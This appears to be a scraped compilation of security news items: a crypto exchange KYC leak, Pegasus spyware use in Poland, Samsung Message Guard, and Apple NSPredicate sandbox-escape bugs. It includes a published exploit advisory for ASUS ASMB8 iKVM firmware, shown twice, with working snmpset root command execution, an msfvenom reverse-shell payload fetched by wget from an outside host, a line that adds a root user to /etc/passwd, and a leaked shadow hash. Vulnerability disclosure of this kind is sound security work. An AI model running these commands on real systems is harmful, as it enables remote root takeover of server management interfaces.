By Habiba Rashid
The database was exposed due to a misconfigured AWS S3 bucket.
This is a post from HackRead.com Read the original post: Crypto exchange Fiatusdt leaked trove of users KYC data

****The server was exposed to the public without any password or security authentication, allowing access to tens of thousands of passport and ID card copies.****

In recent news, Jeremiah Fowler of Website Planet discovered an exposed database belonging to the online currency exchange platform, Fiatusdt. The database contained **cryptocurrency** sales records, including customer names, bank account numbers, purchase and sales records, and other sensitive information.

Online currency exchanges are internet-based platforms that facilitate the transfer of currencies for distribution in a stable, centralized setting between countries or companies. Like their physical counterparts, online currency exchanges make money by charging a nominal fee and/or through the bid-ask spread in a currency.

Amongst the exposed information were Know Your Customer (**KYC**) compliance records and identification images, which were particularly concerning as they contained sensitive information that proved the identity of customers.

Fowler reported having viewed as many as 20,000 passport and identity card images. The customer ID documents appeared to belong to individuals from all over the world, including the following countries:

1.  Oman
2.  China
3.  India
4.  Malaysia
5.  Australia
6.  Indonesia
7.  Singapore and others.

According to Website Planet’s **blog post**, it is still unclear how many users were affected by the data leak since the total number of records could not be seen, and whether or not the exposed records were accessed by anyone before being discovered.

Publically leaked folders and one of the ID cards (Image credit: Website Planet)

The database also contained screenshots of deposit and withdrawal amounts, which exposed bank transfer records identifying customer names, account numbers, email addresses, phone numbers, and other sensitive information.

Additionally, transaction IDs and wallet addresses for transactions were present in the database.

This database was exposed due to a **misconfigured AWS storage** name and address, which allowed public access. This resulted in the database being open and accessible to anyone with an internet connection.

The company was notified of the breach through a responsible disclosure notice, and public access to the database was subsequently closed.

1.  **Cryptoworm infecting AWS Cloud to mine cryptocurrency**
2.  **350M email IDs exposed on misconfigured AWS S3 bucket**
3.  **Pegasus Airlines Leaked 6.5TB Data in AWS Bucket Mess Up**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Crypto exchange Fiatusdt leaked trove of users KYC data

A mayor backing Polish opposition elections in parliament has been targeted by special services with Pegasus spyware.

Polish special services reportedly used the infamous Pegasus mobile spyware to monitor the phone of a mayor backing government opposition, according to a new report.

Polish liberal news outlet Gazeta Wyborcza, characterized by Reuters as being openly against the county's ruling "PiS" nationalists, reported while Sopot mayor Jacek Karnowski was working to elect opposition candidates in Poland's upper house of Parliament between 2018 and 2019, he was targeted by Israel-based NSO Group's Pegasus spyware. The report added that Karnowski's name was also discovered on a list of targets hacked with Pegasus spyware by Poland's special services.

"We will not allow the PiS machine to further destroy democracy, lead Poland to the East and sovietise our country," Karnowski told Reuters in reaction to the report. "The politicians who inspired and commissioned these activities belong in prison."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Polish Politician's Phone Patrolled by Pegasus

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

ASUS ASMB8 iKVM firmware versions 1.14.51 and below suffers from a flaw where SNMPv2 can be used with write access to introduce arbitrary extensions to achieve remote code execution as root. The researchers also discovered a hardcoded administrative account.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Exploit Title:        ASUS ASMB8 iKVM RCE and SSH Root Access  
# Date:                 2023-02-16  
# Exploit Author:       d1g@segfault.net for NetworkSEC [NWSSA-002-2023]  
# Vendor Homepage:      https://servers.asus.com/search?q=ASMB8  
# Version/Model:        ASMB8 iKVM Firmware <= 1.14.51 (probably others)  
# Tested on:            Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl  
# CVE:                  CVE-2023-26602  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++  
0x00    DESCRIPTION  
++++++++++++++++++++

During a recent engagement, a remote server management interface has been   
discovered. Furthermore, SNMPv2 was found to be enabled, offering write  
access to the private community, subsequently allowing us to introduce  
SNMP arbitrary extensions to achieve RCE.

We also found a hardcoded account sysadmin:superuser by cracking the   
shadow file (md5crypt) found on the system and identifed an "anonymous"  
user w/ the same password, however a lock seems to be in place to prevent  
using these credentials via SSH (running defshell as default shell).

+++++++++++++++  
0x01    IMPACT  
+++++++++++++++

By exploiting SNMP arbitrary extension, we are able to run any command on  
the system w/ root privileges, and we are able to introduce our own user  
circumventing the defshell restriction for SSH.

+++++++++++++++++++++++++++++++  
0x02    PROOF OF CONCEPT (PoC)  
+++++++++++++++++++++++++++++++

At first, we have to create required extensions on the system, e.g. via

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'

and if everything is set, we can just run that command by

snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

which will execute our defined command and show us its output.

+++++++++++++++++++++++++++++++  
0x03    SSH Remote Root Access  
+++++++++++++++++++++++++++++++

The identified RCE can be used to transfer a reverse tcp shell created  
by msfvenom for arm little-endian, e.g.

msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin

We can now transfer the binary, adjust permissions and finally run it:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'

Again, we have to request execution of the lines in the MIB via:

snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

We get a reverse connection from the host, and can now act on the local system   
to easily echo our own line into /etc/passwd:

echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd

By setting the standard shell to /bin/sh, we are able to get a SSH root  
shell into the system, effectively circumventing the defshell restriction.

$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g

BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)  
Enter 'help' for a list of built-in commands.

# uname -a  
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown  
# uptime  
 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25  
# head -n 1 /etc/shadow  
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::

---

#EOF

ASUS ASMB8 iKVM 1.14.51 SNMP Remote Root

ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: AMI/ASUS ASMB8 iKVM RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC \[NWSSA-002-2023\] # Vendor Homepage: https://servers.asus.com/search?q=ASMB8 # Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) # Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl # CVE: Currently Unassigned (CVE-2023-XXXXX) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a remote server management interface has been discovered. Furthermore, SNMPv2 was found to be enabled, offering write access to the private community, subsequently allowing us to introduce SNMP arbitrary extensions to achieve RCE. We also found a hardcoded account sysadmin:superuser by cracking the shadow file (md5crypt) found on the system and identifed an "anonymous" user w/ the same password, however a lock seems to be in place to prevent using these credentials via SSH (running defshell as default shell). +++++++++++++++ 0x01 IMPACT +++++++++++++++ By exploiting SNMP arbitrary extension, we are able to run any command on the system w/ root privileges, and we are able to introduce our own user circumventing the defshell restriction for SSH. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ At first, we have to create required extensions on the system, e.g. via snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "\[command\]"' and if everything is set, we can just run that command by snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects which will execute our defined command and show us its output. +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ The identified RCE can be used to transfer a reverse tcp shell created by msfvenom for arm little-endian, e.g. msfvenom -p linux/armle/shell\_reverse\_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin We can now transfer the binary, adjust permissions and finally run it: snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' Again, we have to request execution of the lines in the MIB via: snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects We get a reverse connection from the host, and can now act on the local system to easily echo our own line into /etc/passwd: echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd By setting the standard shell to /bin/sh, we are able to get a SSH root shell into the system, effectively circumventing the defshell restriction. $ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # uname -a Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown # uptime 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 # head -n 1 /etc/shadow sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: --- #EOF

CVE-2023-26602

Categories: Android
Categories: News
Tags: Samsung

Tags:  message guard

Tags:  sandbox

Tags:  zero-click exploit

Tags:  images

Tags:  attachments

Samsung has announced the introduction of Message Guard protection against zero-click exploits for the Samsung Galaxy S23 series.



(Read more...)




The post Samsung adds Message Guard protection against zero-click exploits  appeared first on Malwarebytes Labs.

Samsung has announced the introduction of Message Guard for the Samsung Galaxy S23 series. It will be gradually rolled out to other Galaxy smartphones and tablets later this year.

Message Guard works on images received in messages by the apps “Samsung Messages” and “Messages by Google” and basically acts like a sandbox.

A sandbox in computing is a virtual habitat designed to provide a secluded environment to screen certain files or programs without giving any malware a chance to spread outside of the sandbox across the rest of the “playground”.

Samsung’s Message Guard is a sandbox that aims to protect your device by limiting exposure to invisible threats disguised as image attachments that arrive in messages received by Samsung Messages and Messages by Google. The plan is to release a software update at a later date to let Samsung Message Guard protect you across third party messaging apps as well.

**How it works**

When an image file arrives as an attachment to a message, the file is put in the sandbox and inspected. The file is processed inside the controlled environment of the sandbox to establish that it will not pose a threat to the device if it is released outside of the sandbox. This prevents malicious code from running amok or accessing your files. It does this silently in the background so the user doesn't have to do anything and might not even notice it’s there.

Samsung Message Guard covers the following image formats: PNG, JPG/JPEG, GIF, ICO, WEBP, BMP, and WBMP.

**Zero-click**

Zero-click malware is defined as malware that does not require any user action or input to infect a device or system. Zero-click exploits are files that hide malicious code which do not require user interaction to be executed.

Zero-click exploits typically depend on vulnerabilities in software running on the device, such as the messaging app or the software on the device that renders the image. Such a vulnerability could be used by an attacker to craft a malicious image that automatically executes the malicious code embedded within it.

Samsung Knox already protects against such attachments in audio and video form, behind the scenes. With Message Guard, Samsung says Galaxy users will be protected against exploits in image form too.

**Needed?**

Samsung states in the announcement that there has been no sign of such attacks on Samsung Galaxy smartphones, but it wants to anticipate potential threats and develop preemptive security measures. This is by no means far-fetched if you look at the methods that Pegasus used against iMessage, although those are highly targeted attacks on people in high-level roles.

Would you like us to list the reasons why we think this is not something we’ve been waiting for? OK then, here goes:

*   The Android Operating System is already based on sandboxing, so we don’t see how this is adding any extra protection.
*   There is no indication that this type of protection has been or ever will be needed.
*   At best it will be providing a false sense of security because it says it offers protection (against a non-existent threat).
*   At worst it will stop people from installing actual protection against threats that actually exist, because they think they already are under maximum protection.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Samsung adds Message Guard protection against zero-click exploits 

Apple has revised the security advisories it released last month to include three new vulnerabilities impacting iOS, iPadOS, and macOS.
The first flaw is a race condition in the Crash Reporter component (CVE-2023-23520) that could enable a malicious actor to read arbitrary files as root. The iPhone maker said it addressed the issue with additional validation.
The two other vulnerabilities,

Endpoint Security / Software Update

Apple has revised the security advisories it released last month to include three new vulnerabilities impacting iOS, iPadOS, and macOS.

The first flaw is a race condition in the Crash Reporter component (CVE-2023-23520) that could enable a malicious actor to read arbitrary files as root. The iPhone maker said it addressed the issue with additional validation.

The two other vulnerabilities, credited to Trellix researcher Austin Emmitt, reside in the Foundation framework (CVE-2023-23530 and CVE-2023-23531) and could be weaponized to achieve code execution.

"An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges," Apple said, adding it patched the issues with "improved memory handling."

The medium to high-severity vulnerabilities have been patched in iOS 16.3, iPadOS 16.3, and macOS Ventura 13.2 that were shipped on January 23, 2023.

Trellix, in its own report on Tuesday, classified the two flaws as a "new class of bugs that allow bypassing code signing to execute arbitrary code in the context of several platform applications, leading to escalation of privileges and sandbox escape on both macOS and iOS."

The bugs also bypass mitigations Apple put in place to address zero-click exploits like FORCEDENTRY that was leveraged by Israeli mercenary spyware vendor NSO Group to deploy Pegasus on targets' devices.

As a result, a threat actor could exploit these vulnerabilities to break out of the sandbox and execute malicious code with elevated permissions, potentially granting access to calendar, address book, messages, location data, call history, camera, microphone, and photos.

Even more troublingly, the security defects could be abused to install arbitrary applications or even wipe the device. That said, exploitation of the flaws requires an attacker to have already obtained an initial foothold into it.

"The vulnerabilities above represent a significant breach of the security model of macOS and iOS which relies on individual applications having fine-grained access to the subset of resources they need and querying higher privileged services to get anything else," Emmitt said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Warns of 3 New Vulnerabilities Affecting iPhone, iPad, and Mac Devices

By Deeba Ahmed
The bugs allowed cybercriminals to bypass the iOS system's security protections and execute unauthorized code. 
This is a post from HackRead.com Read the original post: Apple Bug Could Allow Attackers Access to Photos and Messages

The findings are based on previous research from Google and Citizen Lab conducted in 2021 which discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to the Israeli NSO Group.

Apple devices and products are known for their advanced security mechanisms, particularly the iPhone and Macbook. However, the latest research reveals that even Apple products aren’t safe from the prying eyes of threat actors.

Researchers at the cybersecurity firm Trellix Advanced Research Center have disclosed details of a newly discovered privilege escalation bug class that, if exploited, could allow an attacker to sweep up call history, messages, and photos from the device.

According to researchers, the bugs allowed cybercriminals to bypass the iOS system’s security protections and execute unauthorized code. The security flaws were ranked as medium to high in terms of security.

Trellix’s vulnerability research director, Doug McKee, stated that although Apple has addressed the issue, the concern is that these vulnerabilities allow bypassing of Apple’s security model at a “fundamental level.”

Apple said the bugs weren’t exploited in the wild before being fixed.

**How Was the Bug Discovered?**

The findings are based on previous research from Google and Citizen Lab conducted in 2021. The organizations discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to NSO Group.

This was a highly sophisticated exploit found on a Saudi activist’s iPhone and was used for installing Pegasus malware developed by the NSO Group. The same spyware was also found on the iPhones of nine State Department officials in the United States.

This exploit had two key features: first, it tricked the iPhone into opening a malicious PDF disguised as a GIF file. Secondly, it enabled attackers to evade the sandbox that Apple introduced to prevent apps from accessing data from other apps or other parts of the device.

This second feature of ForcedEntry was the basis of Trellix’s research from senior vulnerability researcher Austin Emmitt. A proof-of-concept was released to demonstrate how the bugs could be exploited.

**Vulnerabilities**

Emmitt discovered a new class of vulnerabilities revolving around the NSPredicate tool that filters code within Apple’s systems. This tool was first exploited in ForcedEntry, as the 2021 research revealed, and Apple introduced new measures to prevent this abuse.

However, the mitigation methods were insufficient, as Trellix researchers found that these methods could also be bypassed since bugs in the NSPredicate class were found in multiple places in macOS and iOS systems.

This includes the Springboard app, which manages the home screen on an iPhone and can access photos, location data, and the camera. After exploiting the bugs, the attacker could access places they could not otherwise invade. Attackers trying to exploit it need to gain an initial foothold into the device.

Vulnerabilities in NSPredicate were discovered in macOS 13.2 and iOS 16.3, and Apple patched them with software updates in January. The company also issued CVEs for these flaws—CVE-2023-23530 and CVE-2023-23531—and released new versions of macOS and iOS.

1.  Apple AirTags used as trojan for credential hacking
2.  iOS Devices Receive Vital Security Updates from Apple
3.  Charging cable remotely steals data from Apple devices
4.  55 Apple bugs risked iCloud account takeover, data theft
5.  Study: Android sends more data to Google than iOS to Apple

Apple Bug Could Allow Attackers Access to Photos and Messages

Security researchers found a class of flaws that, if exploited, would allow an attacker to access people’s messages, photos, and call history.

For years, Apple has hardened the security systems on iPhones and Macs. But no company is immune from such issues. Research reveals a new class of bugs that can affect Apple’s iPhone and Mac operating systems and if exploited could allow an attacker to sweep up your messages, photos, and call history.

Researchers from security firm Trellix’s Advanced Research Center are today publishing details of a bug that could allow criminal hackers to break out of Apple’s security protections and run their own unauthorized code. The team says the security flaws they found—which they rank as medium to high severity—bypass protections Apple had put in place to protect users.

“The key thing here is the vulnerabilities break Apple’s security model at a fundamental level,” says Doug McKee, director of vulnerability research at Trellix. McKee says that finding the new bug class means researchers and Apple will potentially be able to find more similar bugs and improve overall security protections. Apple has fixed the bugs the company found, and there is no evidence they were exploited.

Trellix’s findings build on previous work by Google and Citizen Lab, a University of Toronto research facility. In 2021, the two organizations discovered ForcedEntry, a zero-click, zero-day iOS exploit that was linked to Israeli spyware maker NSO Group. (The exploit, described as highly sophisticated, was found on the iPhone of a Saudi activist and used to install NSO’s Pegasus malware.)

Analysis of ForcedEntry showed it involved two key parts. The first tricked an iPhone into opening a malicious PDF that was disguised as a GIF. The second part allowed attackers to escape Apple’s sandbox, which keeps apps from accessing data stored by other apps and from accessing other parts of the device. Trellix’s research, by senior vulnerability researcher Austin Emmitt, focuses on that second part and ultimately used the flaws he found to bypass the sandbox.

Specifically, Emmitt found a class of vulnerabilities that revolve around NSPredicate, a tool that can filter code within Apple’s systems. NSPredicate was first abused in ForcedEntry, and as a result of that research in 2021, Apple introduced new ways to stop the abuse. However, those don’t appear to have been enough. “We discovered that these new mitigations could be bypassed,” Trellix says in a blog post outlining the details of its research.

McKee explains that the bugs within this new NSPredicate class existed in multiple places across macOS and iOS, including within Springboard, the app that manages the iPhone’s home screen and can access location data, photos, and the camera. Once the bugs are exploited, the attacker can access areas that are meant to be closed off. A proof-of-concept video published by Trellix shows how the vulnerabilities can be exploited. 

The new class of bugs “brings a lens to an area that people haven’t been researching before because they didn’t know it existed,” McKee says. “Especially with that backdrop of ForcedEntry because somebody at that sophistication level already was leveraging a bug in this class.”

Crucially, any attacker trying to exploit these bugs would require an initial foothold into someone’s device. They would need to have found a way in before being able to abuse the NSPredicate system. (The existence of a vulnerability doesn’t mean that it has been exploited.)

Apple patched the NSPredicate vulnerabilities Trellix found in its macOS 13.2 and iOS 16.3 software updates, which were released in January. Apple has also issued CVEs for the vulnerabilities that were discovered: CVE-2023-23530 and CVE-2023-23531. Since Apple addressed these vulnerabilities, it has also released newer versions of macOS and iOS. These included security fixes for a bug that was being exploited on people’s devices. Make sure you update your iPhone, iPad, and Mac each time a new version of the operating system becomes available.

A New Kind of Bug Spells Trouble for iOS and macOS Security

By Deeba Ahmed
Samsung Message Guard is a new feature that protects users against zero-click attacks, including those appearing from messaging apps.
This is a post from HackRead.com Read the original post: New Samsung Message Guard protects users against Zero-Click attacks

Samsung Message Guard will inspect the file bit by bit and process it in a controlled environment, thus neutralizing the threat to ensure the malicious file doesn’t infect the device.

Zero-Click attacks have become very powerful and widespread, mainly due to their ease of deployment. With the evolution of zero-click attacks, mobile phone manufacturers, such as Samsung, are also improving their defence mechanisms against such threats. Samsung Message Guard is one such step that prevents users from zero-click exploits on Samsung Galaxy S23 smartphones.

**What are Zero-Click Attacks?**

Zero-click exploits can install malware on a device using just a JPEG or PNG image file. They are pretty dangerous, as the user doesn’t need to interact with the file, such as clicking or tapping on it, to get their device infected. Users cannot detect these exploits while the malicious code steals their private data and transmits it to hackers.

As previously reported, state-sponsored cybercriminals used zero-click attacks to install NSO Group’s spyware Pegasus onto the mobile phones of dissidents, government officials, activists, politicians, and journalists.

**Samsung Message Guard Will Protect Against Zero-Click Attacks**

Samsung Galaxy smartphones are already equipped with advanced safety measures and a powerful Samsung Knox platform that thwart attacks exploiting audio and video formats. With Samsung Message Guard, the company has taken another step to safeguard its devices and restrict their exposure to malicious codes hidden in image attachments.

According to Samsung’s press release, this feature will work on Samsung Messages and Messages by Google. The company will also release an update to make this feature compatible with third-party messaging apps.

> Simply put, Samsung Message Guard automatically neutralizes any potential threat hiding in image files before they have a chance to do you any harm. It also runs silently and largely invisibly in the background and does not need to be activated by the user.
> 
> Samsung

**How Does Message Guard Prevent Zero-Click Attacks?**

You can consider it an advanced sandbox or a virtual quarantine; it will run in the background with the Messages app. As soon as any image file is received, it will be isolated from the rest of the data to prevent any hidden malicious code from accessing the device data or interacting with the OS.

Samsung Message Guard will inspect the file bit by bit and process it in a controlled environment, thus neutralizing the threat to ensure the malicious file doesn’t infect the device.

Message Guard will look for malware in PNG, JPG, JPEG, GIF, ICO, WEBP, BMP, and WBMP formats. The feature will be rolled out to different versions of Galaxy smartphones and tablets running One UI 5.1 or above versions.

Tag

#asus